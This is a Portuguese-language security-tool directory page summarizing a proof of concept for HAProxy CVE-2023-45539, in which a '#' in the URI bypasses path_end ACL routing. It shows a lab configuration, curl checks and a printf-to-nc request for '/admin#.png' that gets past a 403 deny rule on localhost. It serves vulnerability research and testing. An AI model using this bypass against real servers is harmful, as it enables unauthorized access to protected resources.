Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/slicingmelon/haproxy-cve-2023-45539-poc
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de PenetraçãoConfiguração Incorreta
GitHubslicingmelon/haproxy-cve-2023-45539-poc

HAProxy-CVE-2023-45539-PoC

HAProxy-CVE-2023-45539-PoC

Ver Repositório
2há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

HAProxy-CVE-2023-45539-PoC

O HAProxy anterior à versão 2.8.2 aceita # como parte do componente URI, o que pode permitir que atacantes remotos obtenham informações sensíveis ou tenham outro impacto não especificado devido à má interpretação de uma regra path_end, como rotear index.html#.png para um servidor estático.

O que é mal roteado neste CVE não é nenhuma extensão que o backend "suporta" — são apenas aquelas que o próprio HAProxy está configurado para rotear usando ACLs path_end (ou regex).

root@kitploit:~
acl is_static path_end .png .jpg .gif .css .js
use_backend be_static if is_static

Isso significa:

O HAProxy não se importa se o backend consegue realmente servir .png, .js, etc.

Ele apenas verifica a correspondência do sufixo no caminho da requisição.

Se o sufixo corresponder a uma dessas strings, ele roteia para be_static.

Então:

/admin#.png → corresponde a .png → vai para be_static → bypass

/admin#.asc → não corresponde → permanece em be_app → encontra negação → 403

root@kitploit:~
curl -i http://localhost:6655/public                                               
HTTP/1.1 200 OK
content-length: 7
content-type: text/plain

APP OK
root@kitploit:~
curl -i http://localhost:6655/admin 
HTTP/1.1 403 Forbidden
content-length: 93
cache-control: no-cache
content-type: text/html

<html><body><h1>403 Forbidden</h1>
Request forbidden by administrative rules.
</body></html>

Bypass

root@kitploit:~
printf 'GET /admin#.png HTTP/1.1\r\nHost: localhost\r\n\r\n' | nc -q1 127.0.0.1 6655
HTTP/1.1 200 OK
content-length: 31
content-type: text/plain

STATIC OK (routed by path_end)
Baixar ferramenta